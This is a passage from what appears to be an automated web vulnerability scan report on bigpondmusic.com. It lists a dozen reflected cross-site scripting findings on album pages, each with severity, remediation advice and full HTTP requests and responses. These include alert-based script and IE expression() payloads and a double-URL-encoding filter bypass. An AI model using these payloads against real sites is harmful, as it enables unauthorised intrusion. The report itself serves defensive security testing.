Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumef448"><script>alert(1)</script>b1a2ebf5bfd/kings-of-leon/come-around-sundown" />
...[SNIP]...

2.85. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee02b'%3be0cb5b4004e was submitted in the REST URL parameter 1. This input was echoed as ee02b';e0cb5b4004e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumee02b'%3be0cb5b4004e/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumee02b';e0cb5b4004e';
   s.prop4 = 'kings-of-leon';
   s.prop5 = 'come-around-sundown';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' +
...[SNIP]...

2.86. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 was submitted in the h parameter. This input was echoed as 111ac"style="x:expression(alert(1))"f8333a80ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?h=756194845111ac"style%3d"x%3aexpression(alert(1))"f8333a80ae5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?h=756194845111ac"style="x:expression(alert(1))"f8333a80ae5" />
...[SNIP]...

2.87. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7da47"style="x:expression(alert(1))"9e1191b4fee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/kings-of-leon/come-around-sundown?7da47"style%3d"x%3aexpression(alert(1))"9e1191b4fee=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Kings Of Leon - Come Around
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/kings-of-leon/come-around-sundown?7da47"style="x:expression(alert(1))"9e1191b4fee=1" />
...[SNIP]...

2.88. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9a3'%3b41e6347e7d8 was submitted in the REST URL parameter 1. This input was echoed as dd9a3';41e6347e7d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd9a3'%3b41e6347e7d8/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd9a3';41e6347e7d8';
   s.prop4 = 'mando-diao';
   s.prop5 = 'mtv-unplugged-above-and-beyond';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop
...[SNIP]...

2.89. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2 was submitted in the REST URL parameter 1. This input was echoed as 34330"><script>alert(1)</script>c8207af3af2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album34330%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8207af3af2/mando-diao/mtv-unplugged-above-and-beyond HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album34330"><script>alert(1)</script>c8207af3af2/mando-diao/mtv-unplugged-above-and-beyond" />
...[SNIP]...

2.90. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 was submitted in the h parameter. This input was echoed as 10ec8"style="x:expression(alert(1))"5d723e85314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style%3d"x%3aexpression(alert(1))"5d723e85314 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?h=76630773610ec8"style="x:expression(alert(1))"5d723e85314" />
...[SNIP]...

2.91. http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69935"style%3d"x%3aexpression(alert(1))"58a70fee747 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69935"style="x:expression(alert(1))"58a70fee747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?69935"style%3d"x%3aexpression(alert(1))"58a70fee747=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126980


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?69935"style="x:expression(alert(1))"58a70fee747=1" />
...[SNIP]...

2.92. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b was submitted in the REST URL parameter 1. This input was echoed as c3413"><script>alert(1)</script>cef7e926d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc3413"><script>alert(1)</script>cef7e926d6b/massive-attack/atlas-air-ep" />
...[SNIP]...

2.93. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b33'%3ba641b115d06 was submitted in the REST URL parameter 1. This input was echoed as d9b33';a641b115d06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd9b33'%3ba641b115d06/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd9b33';a641b115d06';
   s.prop4 = 'massive-attack';
   s.prop5 = 'atlas-air-ep';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.94. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 was submitted in the h parameter. This input was echoed as 9f0a6"style="x:expression(alert(1))"8eeaf2aab30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?h=7647081059f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?h=7647081059f0a6"style="x:expression(alert(1))"8eeaf2aab30" />
...[SNIP]...

2.95. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0802"style="x:expression(alert(1))"d70ff86ab90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107490


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?f0802"style="x:expression(alert(1))"d70ff86ab90=1" />
...[SNIP]...

2.96. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

